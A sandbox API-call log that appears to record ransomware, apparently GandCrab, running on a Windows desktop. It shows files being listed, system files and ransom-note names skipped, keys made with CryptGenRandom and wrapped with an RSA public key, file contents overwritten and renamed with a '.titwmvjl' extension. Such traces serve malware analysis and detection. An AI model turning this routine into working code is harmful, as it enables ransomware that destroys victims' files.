1 [0089.019] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HhfN1hggoxlCjbyE9V5.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\hhfn1hggoxlcjbye9v5.flv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HhfN1hggoxlCjbyE9V5.flv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\hhfn1hggoxlcjbye9v5.flv.titwmvjl"), dwFlags=0x1) returned 1 [0089.019] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.020] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.020] lstrcmpW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2=".") returned 1 [0089.020] lstrcmpW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2="..") returned 1 [0089.020] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="m0a8-U9niTiMmRaq5uy.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\m0a8-U9niTiMmRaq5uy.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\m0a8-U9niTiMmRaq5uy.png" [0089.020] lstrlenW (lpString=".titwmvjl") returned 9 [0089.020] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\m0a8-U9niTiMmRaq5uy.png") returned 53 [0089.020] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.020] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\m0a8-U9niTiMmRaq5uy.png.titwmvjl") returned 62 [0089.020] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\m0a8-U9niTiMmRaq5uy.png") returned 53 [0089.020] lstrlenW (lpString=".png") returned 4 [0089.020] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.020] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".png ") returned 5 [0089.020] lstrcmpiW (lpString1=".png", lpString2=".titwmvjl") returned -1 [0089.020] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.020] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\m0a8-U9niTiMmRaq5uy.png") returned 53 [0089.020] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\m0a8-U9niTiMmRaq5uy.png") returned 53 [0089.020] lstrcmpiW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2="desktop.ini") returned 1 [0089.020] lstrcmpiW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2="autorun.inf") returned 1 [0089.020] lstrcmpiW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2="ntuser.dat") returned -1 [0089.020] lstrcmpiW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2="iconcache.db") returned 1 [0089.020] lstrcmpiW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2="bootsect.bak") returned 1 [0089.020] lstrcmpiW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2="boot.ini") returned 1 [0089.021] lstrcmpiW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2="ntuser.dat.log") returned -1 [0089.021] lstrcmpiW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2="thumbs.db") returned -1 [0089.021] lstrcmpiW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.021] lstrcmpiW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.021] lstrcmpiW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2="KRAB-DECRYPT.html") returned 1 [0089.021] lstrcmpiW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2="CRAB-DECRYPT.html") returned 1 [0089.021] lstrcmpiW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.021] lstrcmpiW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.021] lstrcmpiW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2="ntldr") returned -1 [0089.021] lstrcmpiW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2="NTDETECT.COM") returned -1 [0089.021] lstrcmpiW (lpString1="m0a8-U9niTiMmRaq5uy.png", lpString2="Bootfont.bin") returned 1 [0089.021] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\m0a8-U9niTiMmRaq5uy.png") returned 53 [0089.021] lstrlenW (lpString=".png") returned 4 [0089.021] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.021] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".png ") returned 5 [0089.021] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.021] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.021] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\m0a8-U9niTiMmRaq5uy.png" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\m0a8-u9nitimmraq5uy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0089.022] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.022] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0089.022] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.022] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.023] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.024] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.024] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.024] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.024] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0089.024] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.024] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.024] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.024] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.025] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.026] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.026] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.026] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.026] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0089.026] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.026] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.026] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.026] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.027] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.028] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.028] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503438) returned 1 [0089.028] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.028] CryptGetKeyParam (in: hKey=0x503438, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.028] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.028] CryptEncrypt (in: hKey=0x503438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.029] GetLastError () returned 0x0 [0089.029] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.029] CryptDestroyKey (hKey=0x503438) returned 1 [0089.029] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.029] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.029] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.029] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.030] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.030] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5032f8) returned 1 [0089.030] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.030] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.030] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.031] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.031] GetLastError () returned 0x0 [0089.031] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.031] CryptDestroyKey (hKey=0x5032f8) returned 1 [0089.031] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.031] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.031] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.031] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.032] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xfe02, lpOverlapped=0x0) returned 1 [0089.038] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff01fe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.038] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xfe02, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xfe02, lpOverlapped=0x0) returned 1 [0089.040] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.040] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0089.042] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.045] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.046] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.046] CloseHandle (hObject=0x2ac) returned 1 [0089.046] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\m0a8-U9niTiMmRaq5uy.png" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\m0a8-u9nitimmraq5uy.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\m0a8-U9niTiMmRaq5uy.png.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\m0a8-u9nitimmraq5uy.png.titwmvjl"), dwFlags=0x1) returned 1 [0089.047] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.047] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.047] lstrcmpW (lpString1="NDJwvg.flv", lpString2=".") returned 1 [0089.047] lstrcmpW (lpString1="NDJwvg.flv", lpString2="..") returned 1 [0089.047] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="NDJwvg.flv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NDJwvg.flv") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NDJwvg.flv" [0089.047] lstrlenW (lpString=".titwmvjl") returned 9 [0089.047] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NDJwvg.flv") returned 40 [0089.047] VirtualAlloc (lpAddress=0x0, dwSize=0x90, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.047] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NDJwvg.flv.titwmvjl") returned 49 [0089.047] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NDJwvg.flv") returned 40 [0089.047] lstrlenW (lpString=".flv") returned 4 [0089.047] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.048] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".flv ") returned 5 [0089.048] lstrcmpiW (lpString1=".flv", lpString2=".titwmvjl") returned -1 [0089.048] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.048] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NDJwvg.flv") returned 40 [0089.048] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NDJwvg.flv") returned 40 [0089.048] lstrcmpiW (lpString1="NDJwvg.flv", lpString2="desktop.ini") returned 1 [0089.048] lstrcmpiW (lpString1="NDJwvg.flv", lpString2="autorun.inf") returned 1 [0089.048] lstrcmpiW (lpString1="NDJwvg.flv", lpString2="ntuser.dat") returned -1 [0089.048] lstrcmpiW (lpString1="NDJwvg.flv", lpString2="iconcache.db") returned 1 [0089.048] lstrcmpiW (lpString1="NDJwvg.flv", lpString2="bootsect.bak") returned 1 [0089.048] lstrcmpiW (lpString1="NDJwvg.flv", lpString2="boot.ini") returned 1 [0089.048] lstrcmpiW (lpString1="NDJwvg.flv", lpString2="ntuser.dat.log") returned -1 [0089.048] lstrcmpiW (lpString1="NDJwvg.flv", lpString2="thumbs.db") returned -1 [0089.048] lstrcmpiW (lpString1="NDJwvg.flv", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.048] lstrcmpiW (lpString1="NDJwvg.flv", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.048] lstrcmpiW (lpString1="NDJwvg.flv", lpString2="KRAB-DECRYPT.html") returned 1 [0089.048] lstrcmpiW (lpString1="NDJwvg.flv", lpString2="CRAB-DECRYPT.html") returned 1 [0089.048] lstrcmpiW (lpString1="NDJwvg.flv", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.048] lstrcmpiW (lpString1="NDJwvg.flv", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.048] lstrcmpiW (lpString1="NDJwvg.flv", lpString2="ntldr") returned -1 [0089.048] lstrcmpiW (lpString1="NDJwvg.flv", lpString2="NTDETECT.COM") returned -1 [0089.048] lstrcmpiW (lpString1="NDJwvg.flv", lpString2="Bootfont.bin") returned 1 [0089.048] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NDJwvg.flv") returned 40 [0089.048] lstrlenW (lpString=".flv") returned 4 [0089.048] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.049] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".flv ") returned 5 [0089.049] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.049] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.049] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NDJwvg.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\ndjwvg.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0089.049] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.049] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0089.050] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.050] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.050] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.051] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.051] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.052] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.052] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0089.052] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.052] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.052] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.052] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.052] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.053] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.053] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.053] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.054] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0089.054] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.054] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.054] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.054] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.054] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.055] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.055] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503778) returned 1 [0089.055] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.055] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.055] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.056] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.056] GetLastError () returned 0x0 [0089.056] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.056] CryptDestroyKey (hKey=0x503778) returned 1 [0089.056] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.056] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.056] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.056] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.057] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.057] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503978) returned 1 [0089.057] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.058] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.058] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.058] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.058] GetLastError () returned 0x0 [0089.058] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.058] CryptDestroyKey (hKey=0x503978) returned 1 [0089.058] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.058] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.058] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.059] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.059] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xdaf0, lpOverlapped=0x0) returned 1 [0089.066] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff2510, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.066] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xdaf0, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xdaf0, lpOverlapped=0x0) returned 1 [0089.067] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.067] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0089.068] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.072] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.072] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.073] CloseHandle (hObject=0x2ac) returned 1 [0089.073] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NDJwvg.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\ndjwvg.flv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NDJwvg.flv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\ndjwvg.flv.titwmvjl"), dwFlags=0x1) returned 1 [0089.074] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.074] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.074] lstrcmpW (lpString1="NHxpQXj.mp3", lpString2=".") returned 1 [0089.074] lstrcmpW (lpString1="NHxpQXj.mp3", lpString2="..") returned 1 [0089.074] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="NHxpQXj.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NHxpQXj.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NHxpQXj.mp3" [0089.074] lstrlenW (lpString=".titwmvjl") returned 9 [0089.074] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NHxpQXj.mp3") returned 41 [0089.074] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.074] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NHxpQXj.mp3.titwmvjl") returned 50 [0089.075] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NHxpQXj.mp3") returned 41 [0089.075] lstrlenW (lpString=".mp3") returned 4 [0089.075] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.075] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0089.075] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0089.075] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.075] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NHxpQXj.mp3") returned 41 [0089.075] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NHxpQXj.mp3") returned 41 [0089.075] lstrcmpiW (lpString1="NHxpQXj.mp3", lpString2="desktop.ini") returned 1 [0089.075] lstrcmpiW (lpString1="NHxpQXj.mp3", lpString2="autorun.inf") returned 1 [0089.075] lstrcmpiW (lpString1="NHxpQXj.mp3", lpString2="ntuser.dat") returned -1 [0089.075] lstrcmpiW (lpString1="NHxpQXj.mp3", lpString2="iconcache.db") returned 1 [0089.075] lstrcmpiW (lpString1="NHxpQXj.mp3", lpString2="bootsect.bak") returned 1 [0089.075] lstrcmpiW (lpString1="NHxpQXj.mp3", lpString2="boot.ini") returned 1 [0089.075] lstrcmpiW (lpString1="NHxpQXj.mp3", lpString2="ntuser.dat.log") 